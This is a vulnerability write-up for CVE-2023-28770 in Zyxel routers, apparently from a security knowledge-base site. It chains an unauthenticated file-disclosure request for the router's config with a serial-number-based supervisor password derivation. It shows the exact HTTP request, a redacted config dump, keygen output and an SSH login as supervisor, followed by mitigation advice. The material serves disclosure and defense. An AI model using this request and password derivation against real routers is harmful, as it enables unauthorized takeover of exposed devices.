Very High
CVE-2023-28770
CVE-2023-28770
Description
The sensitive information exposure vulnerability in the CGI “Export_Log” and the binary “zcmd” in Zyxel DX5401-B0 firmware versions prior to V5.17(ABYO.1)C0 could allow a remote unauthenticated attacker to read the system files and to retrieve the password of the supervisor from the encrypted file.
Add Assessment
Technical Analysis
In December 2022, SEC Consult released a blog with the title The enemy from within: Unauthenticated Buffer Overflows in Zyxel routers still haunting users . The blog explains an unauthenticated buffer overflow in more then 40 different Zyxel router models and the fast amount of thousands of routers that are vulnerable and accessible via the Internet.
The impact is still quite limited because the published Metasploit exploit module only works from the LAN side.
However, the Unauthenticated Buffer Overflow is not the only vulnerability on these routers and SEC Consult discovered another 7 vulnerabilities that are described in their security analysis Multiple Critical Vulnerabilities in multiple Zyxel devices.
While reading the security analysis and reviewing the other vulnerabilities, I discovered a new opportunity to build an exploit by chaining two other vulnerabilities that will allow an unauthenticated attacker to get privileged access to the Zyxel router from either the WAN or LAN side. The potential of this exploit to attack from the WAN side makes it quite dangerous taking into account the large number of non-patched Zyxel routers out there on the Internet.
Recently, CVE-2023-28770 has been released covering the LFI vulnerability that is used in this chained exploit.
Zyxel router chained RCE
Exploiting an unauthenticated local file disclosure (LFI) vulnerability and a weak password derivation algorithm
The first vulnerability that stood out to me is the LFI vulnerability that is discussed in section 2 of the Security Analysis by SEC Consult.
The LFI vulnerability is present in the zhttp binary that allows an unauthenticated attacker to read the entire configuration of the router via the vulnerable endpoint /Export_Log?/data/zcfg_config.json.
The burp request below shows a redacted response of the information that is disclosed such as encrypted passwords, account information, information on services configuration (FTP, Telnet, SSH), and hardware details such as serial number, hardware model etc. In total around 4000 lines of nested JSON information that you would not like to share with anyone out there.
LFI Burp request and response
GET /Export_Log?/data/zcfg_config.json HTTP/1.1 Host: zyxel-vuln-router:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Connection: close
Response (REDACTED)
HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Length: 148678 Date: Fri, 14 Apr 2023 08:47:46 GMT X-Frame-Options: sameorigin Content-Security-Policy: frame-ancestors 'self' ---- Hardware Information ---- { "Manufacturer":"ZYXEL", "ManufacturerOUI":"XXXXX", "ModelName":"VMG3625-T20A", "Description":"Wireless AC VDSL2 4-port Gateway with USB", "ProductClass":"VMG3625-T20A", "SerialNumber":"S000Y00000000", "SoftwareVersion":"V5.30(ABOU.2)b1_I0_20180821", "AdditionalHardwareVersion":"", "AdditionalSoftwareVersion":"", "UpTime":607055, "FirstUseDate":"2023-03-21T09:07:41", "VendorConfigFileNumberOfEntries":0, "SupportedDataModelNumberOfEntries":0, "ProcessorNumberOfEntries":0, "VendorLogFileNumberOfEntries":0, "LocationNumberOfEntries":0, "FixManufacturerOUI":"" }, ---- Account Information---- "X_ZYXEL_LoginCfg":{ "LoginGroupConfigurable":true, "LogGp":[ { "GP_Privilege":"_encrypt_XXXXXXXXXXXXXX", "Account":[ { "AutoShowQuickStart":false, "Enabled":true, "EnableQuickStart":true, "Page":"", "Username":"root", "Password":"", "PasswordHash":"", "Privilege":"_encrypt_XXXXXXXXXXXXX", "GetConfigByFtp":true, "DefaultPassword":"_encrypt_XXXXXXXXXXXXXX", "DefaultGuiPassword":"", "ResetDefaultPassword":false, "shadow":"root:$6$XXXXXXXXXXX:0::::::\n", "smbpasswd":"root:0:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:33A9D53C23525B5F63A0C536445E2B76:[U ]:LCT-0000004E:\n", "ConfigAccountFromWAN":false, "DefPwLength":8, "AccountCreateTime":0, "AccountRetryTime":3, "AccountIdleTime":300, "AccountLockTime":300, "RemoHostAddress":"", "DotChangeDefPwd":false, "ShowSkipBtnInChgDefPwdPage":false, "AutoGenPwdBySn":false, "RemoteAccessPrivilege":"LAN", "OldDefaultPassword":"", "CardOrder":"", "ThemeColor":"", "HiddenPage":"" }, { "AutoShowQuickStart":false, "Enabled":true, "EnableQuickStart":true, "Page":"", "Username":"supervisor", "Password":"", "PasswordHash":"", "Privilege":"_encrypt_XXXXXXXXXXX", "DefaultPassword":"_encrypt_XXXXXXXXXXX", "DefaultGuiPassword":"", "ResetDefaultPassword":false, "shadow":"supervisor:$6$XXXXXXXXXX:0::::::\n", "smbpasswd":"supervisor:12:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:33A9D53C23525B5F63A0C536445E2B76:[U ]:LCT-0000004E:\n", "ConfigAccountFromWAN":false, "DefPwLength":8, "AccountCreateTime":0, "AccountRetryTime":3, "AccountIdleTime":300, "AccountLockTime":300, "RemoHostAddress":"", "DotChangeDefPwd":false, "ShowSkipBtnInChgDefPwdPage":false, "AutoGenPwdBySn":false, "RemoteAccessPrivilege":"LAN", "OldDefaultPassword":"", "CardOrder":"", "ThemeColor":"", "HiddenPage":"" } ], "Level":"high" }, ---- Service Information ---- "X_ZYXEL_RemoteManagement":{ "Service":[ { "Name":"HTTP", "Enable":true, "Protocol":6, "Port":8080, "Mode":"LAN_WAN", "TrustAll":true, "OldMode":"LAN_ONLY", "RestartDeamon":1, "LifeTime":20, "BoundInterfaceList":"" }, { "Name":"HTTPS", "Enable":true, "Protocol":6, "Port":443, "Mode":"LAN_WAN", "TrustAll":true, "OldMode":"LAN_ONLY", "RestartDeamon":true, "LifeTime":20, "BoundInterfaceList":"" }, { "Name":"FTP", "Enable":true, "Protocol":6, "Port":21, "Mode":"LAN_WAN", "TrustAll":true, "OldMode":"LAN_ONLY", "RestartDeamon":true, "LifeTime":20, "BoundInterfaceList":"" }, { "Name":"TELNET", "Enable":true, "Protocol":6, "Port":23, "Mode":"LAN_WAN", "TrustAll":true, "OldMode":"LAN_ONLY", "RestartDeamon":true, "LifeTime":20, "BoundInterfaceList":"" }, { "Name":"SSH", "Enable":true, "Protocol":6, "Port":22, "Mode":"LAN_WAN", "TrustAll":true, "OldMode":"LAN_ONLY", "RestartDeamon":true, "LifeTime":20, "BoundInterfaceList":"" },
Now this information disclosure in itself will not pose a direct threat to these routers, but of course attackers could try to crack the obtained encrypted shadow passwords, but this will take a long time.
So is there any other way to use the disclosed information for a successful attack?
And of course the answer is YES!
The second vulnerability that comes into play is the vulnerability described in section 3 of the analysis, “Unsafe Storage of Sensitive Data”.
It explains the password derivation technique used to decrypt the _encrypted_XXXXXX passwords in the JSON configuration file using a static AES Key and IV.
But my attention was more drawn to another analysis Getting root on a Zyxel VMG8825-T50 router done by Thomas Rinsma in 2020 that was referenced at the bottom of the section and where Thomas explains the password derivation techniques used on Zyxel routers.
In particular, section “Tangent 2: key and password derivation mechanisms” is quite interesting which describes in detail how the supervisor user password can be derived using the serial key of the router.
So what if we use the LFI vulnerability to get the serial key of the router and try to crack the supervisor password using this password derivation technique.
We can then use the disclosed router services information to check if ssh or telnet is enabled and accessible from the WAN and try to login as supervisor to gain access to the router.
Bogi Napoleon Wennerstrøm has reverse engineered and implemented some of these derivation functions producing the supervisor password.
His repository can be found here on Github.
I tested his password derivation functions and indeed I can confirm that either zcfgBeCommonGenKeyBySerialNumMethod2 or zcfgBeCommonGenKeyBySerialNumMethod3 are working on vulnerable Zyxel routers.
# python ./main.py S000Y00000000 zcfgBeCommonGenKeyBySerialNum : A43338B488 zcfgBeCommonGenKeyBySerialNum_CBT : UdcTaX78 zcfgBeCommonGenKeyBySerialNumMethod2 : 2dc1a078 <== zcfgBeCommonGenKeyBySerialNumMethod3 : 58Pxnwdefr <== zcfgBeCommonGenKeyBySerialNumConfigLength(1) : EXXAY7XF zcfgBeCommonGenKeyBySerialNumConfigLength(2) : 4UxwvUxf zcfgBeCommonGenKeyBySerialNumConfigLength(3) : 4UxavUxf zcfgBeCommonGenKeyBySerialNumConfigLengthOld(1) : EXXAY7XF zcfgBeCommonGenKeyBySerialNumConfigLengthOld(2) : 4UxwvUxf zcfgBeCommonGenKeyBySerialNumConfigLengthOld(3) : 4UxavUxf ┌──(root💀cuckoo)-[~/zyxel_exploit/zyxel-vmg8825-keygen] └─# ssh supervisor@zyxel-vuln-router supervisor@zyxel-vuln-router's password: $ uname -a Linux VMG3625-T20A 2.6.36 #7 SMP Sat Aug 18 12:18:02 CET 2018 mips GNU/Linux $ id uid=12(supervisor) gid=12 groups=12 $
I have created a Metasploit module that chains these two vulnerabilities together to gain access to vulnerable Zyxel routers.
PR submission to mainstream Metasploit is completed and available.
Mitigation
Please follow this Security Advisory of Zyxel to patch your router.
As temporary measure, you should disable all your services on the router such as telnet, ftp and ssh that allows access to the supervisor user and configure your web interface only to be accessible by the admin user.
References
CVE-2023-28770
The enemy from within: Unauthenticated Buffer Overflows in Zyxel routers still haunting users .
Multiple Critical Vulnerabilities in multiple Zyxel devices.
Getting root on a Zyxel VMG8825-T50 router
Zyxel VMG8825-T50 Supervisor Keygen – Github
Zyxel Security Advisory
Metasploit PR: Zyxel router chained RCE using LFI and weak password derivation algorithm
Credits
Credits goes to:
SEC Consult team
Thomas Rinsma
Bogi Napoleon Wennerstrøm
CVSS V3 Severity and Metrics
General Information
Vendors
- zyxel
Products
- dx5401-b0 firmware
Metasploit Modules
References
